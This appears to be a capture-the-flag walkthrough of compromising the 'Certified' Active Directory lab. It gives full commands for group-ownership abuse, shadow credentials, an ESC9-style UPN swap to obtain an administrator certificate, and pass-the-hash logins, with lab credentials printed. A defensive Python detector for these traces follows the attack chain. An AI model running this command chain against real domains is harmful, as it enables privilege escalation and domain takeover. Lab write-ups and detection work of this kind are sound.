Achieved a full compromise of the Certified machine, demonstrating the power of leveraging misconfigurations and services in AD environments. This walkthrough is now live on my website, where I detail the entire process step-by-step to help others understand and replicate similar scenarios during penetration testing. Check it out to learn practical techniques and sharpen your skills!
We begin the engagement with valid credentials for the user Judith Mader in the domain certified.htb. These were obtained from an earlier stage of the assessment:
Username: judith.mader
Password: judith09
User Account: judith.mader (Low privilege)
Target: Escalate privileges to root on the machine.
Tools Utilized: nxc, bloodyAD, dacledit.py, pywhisker, Impacket scripts, and certipy.
An initial Nmap scan revealed several open ports on the domain controller (DC01):
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-22 17:02:33Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP over SSL
3268/tcp open  ldap          Microsoft Global Catalog
3269/tcp open  ssl/ldap      Microsoft Global Catalog over SSL
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open  mc-nmf        .NET Message Framing
Key observations:
Active Directory Indicators: Ports 88 (Kerberos), 389 (LDAP), and 445 (SMB) suggest the presence of a Windows domain controller.
SSL Certificates: The certificate details on the LDAPS ports revealed the hostname DC01.certified.htb and additional domain information, indicating that the domain controller also acts as a certificate authority (Active Directory Certificate Services).
SMB Signing: Nmap scripts indicated SMB signing is enabled and required, which may limit some SMB attack vectors.
With the obtained credentials, SMB authentication was tested using nxc:
nxc smb $IP -u 'judith.mader' -p 'judith09'
Output:
SMB  10.10.11.41  445  DC01  [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.41  445  DC01  [+] certified.htb\judith.mader:judith09
The credentials were successfully authenticated against the SMB service, confirming low-privilege access to the domain.
To map the domain structure and discover potential attack paths, LDAP enumeration was conducted using nxc with BloodHound collection enabled:
nxc ldap dc01.certified.htb -u judith.mader -p judith09 --bloodhound --collection All --dns-tcp --dns-server 10.10.11.41
Output:
LDAP  10.10.11.41  389  DC01  [+] certified.htb\judith.mader:judith09
LDAP  10.10.11.41  389  DC01  Resolved collection methods: objectprops, session, localadmin, dcom, trusts, rdp, container, psremote, acl, group
LDAP  10.10.11.41  389  DC01  Done in 00M 33S
LDAP  10.10.11.41  389  DC01  Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.41_2024-11-22_054454_bloodhound.zip
The output was successfully collected and compressed into a ZIP file, ready for BloodHound analysis.
The BloodHound graph revealed several key attack paths within the Active Directory environment; the chain followed below starts with judith.mader's ownership rights over the Management group.
Used bloodyAD to set judith.mader as the owner of the “Management” group:
bloodyAD --host "$IP" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader
Updated the group permissions with dacledit.py:
python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
Added judith.mader to the “Management” group:
bloodyAD --host $IP -d 'certified.htb' -u 'judith.mader' -p 'judith09' add groupMember "Management" "judith.mader"
Used pywhisker to add a KeyCredential (msDS-KeyCredentialLink, the shadow credentials technique) to management_svc, which produces a PFX certificate usable for PKINIT:
python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target "management_svc" --action add
Generated a Kerberos TGT for management_svc with the PFX via PKINIT (gettgtpkinit.py from PKINITtools):
python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx /home/kali/HTB/Certified/pywhisker/pywhisker/loa78u6G.pfx -pfx-pass 2v752WSk3p8VJ1rYuYXT fuck.ccache
Extracted the NT hash for management_svc with getnthash.py. The -key value is the AS-REP encryption key printed by gettgtpkinit.py, and the ccache from the previous step must be exported via KRB5CCNAME first:
python3 getnthash.py certified.htb/management_svc -key XXXXXXX41f6e9b55f2ce52b9922f38bff7e293ac3989a0XXXXXXXXXXXX
Logged in as management_svc with Evil-WinRM, using the NT hash from the previous step:
evil-winrm -i $IP -u management_svc -H $NT_HASH   # NT hash of management_svc
Discovered that management_svc had GenericAll rights over ca_operator.
Used certipy-ad's shadow credentials module to add a KeyCredential to ca_operator and retrieve its NT hash (shadow auto also removes the added key afterwards):
certipy-ad shadow auto -u management_svc@certified.htb -hashes $NT_HASH -account ca_operator
Updated the UPN (UserPrincipalName) of ca_operator to administrator:
certipy-ad account update -u management_svc@certified.htb -hashes $NT_HASH -user ca_operator -upn administrator
Requested a certificate as ca_operator (whose UPN now reads administrator) using certipy-ad and the ca_operator NT hash obtained from the shadow credentials step:
certipy-ad req -username ca_operator@certified.htb -hashes $CA_OPERATOR_NT_HASH -ca certified-DC01-CA -template CertifiedAuthentication
Restored ca_operator's UPN to its original value:
certipy-ad account update -u management_svc@certified.htb -hashes $NT_HASH -user ca_operator -upn ca_operator@certified.htb
Authenticated as administrator with the new certificate, which returns the administrator NT hash via PKINIT:
certipy-ad auth -pfx administrator.pfx -domain certified.htb
Logged in with Evil-WinRM as administrator, using the hash returned by certipy-ad auth:
evil-winrm -u administrator -H $ADMIN_NT_HASH -i $IP
Result: Full compromise of the Certified machine.
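As an added, defensive illustration (not part of the original walkthrough), the following Python flags the traces the steps above leave in a domain controller's Security log: an msDS-KeyCredentialLink write by a principal other than the account itself (the pywhisker and certipy shadow steps) and a UPN changed to another account's name and then reverted (the ca_operator steps). The event records are constructed and simplified; the field names are assumptions, not raw Windows event XML.

```python
from datetime import datetime, timedelta

# Constructed, simplified Security-log records (not real telemetry from the box).
# 5136 = directory object modified (needs "Audit Directory Service Changes" and
# a SACL on the object); 4738 = user account changed, records the new UPN.
SAMPLE_EVENTS = [
    {"ts": "2024-11-22T17:10:02Z", "id": 5136, "actor": "judith.mader",
     "object": "CN=management_svc,CN=Users,DC=certified,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "op": "Value Added"},
    {"ts": "2024-11-22T17:25:40Z", "id": 4738, "actor": "management_svc",
     "target": "ca_operator", "upn": "administrator"},
    {"ts": "2024-11-22T17:26:11Z", "id": 4738, "actor": "management_svc",
     "target": "ca_operator", "upn": "ca_operator@certified.htb"},
    {"ts": "2024-11-22T18:00:00Z", "id": 4738, "actor": "hr.admin",
     "target": "jdoe", "upn": "jdoe@certified.htb"},
]

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def account_from_dn(dn):
    # "CN=management_svc,CN=Users,..." -> "management_svc"
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def detect(events, revert_window=timedelta(minutes=30)):
    """Return (alert_type, actor, target, detail, ts) tuples, oldest first."""
    alerts, upn_history = [], {}
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        if ev["id"] == 5136 and ev["attribute"].lower() == "msds-keycredentiallink":
            owner = account_from_dn(ev["object"])
            # A key credential written by anyone but the account itself is the shadow-credentials pattern.
            if ev["actor"].lower() != owner:
                alerts.append(("shadow_credential", ev["actor"], owner, ev["attribute"], ev["ts"]))
        elif ev["id"] == 4738 and ev.get("upn"):
            target, new_upn = ev["target"].lower(), ev["upn"].lower()
            local = new_upn.split("@", 1)[0]
            # A UPN naming another account, or with no domain suffix, is the ESC9-style swap.
            if local != target or "@" not in new_upn:
                alerts.append(("upn_mismatch", ev["actor"], target, new_upn, ev["ts"]))
            hist = upn_history.setdefault(target, [])
            # Restoring the original UPN shortly after a swap is the cleanup step of that abuse.
            if hist and local == target:
                prev_ts, prev_upn = hist[-1]
                if parse_ts(ev["ts"]) - prev_ts <= revert_window and prev_upn.split("@", 1)[0] != target:
                    alerts.append(("upn_revert", ev["actor"], target, prev_upn, ev["ts"]))
            hist.append((parse_ts(ev["ts"]), new_upn))
    return alerts
```

Run against the sample, the three alerts correspond to the pywhisker step, the UPN swap and its reversal; the ordinary hr.admin change produces nothing.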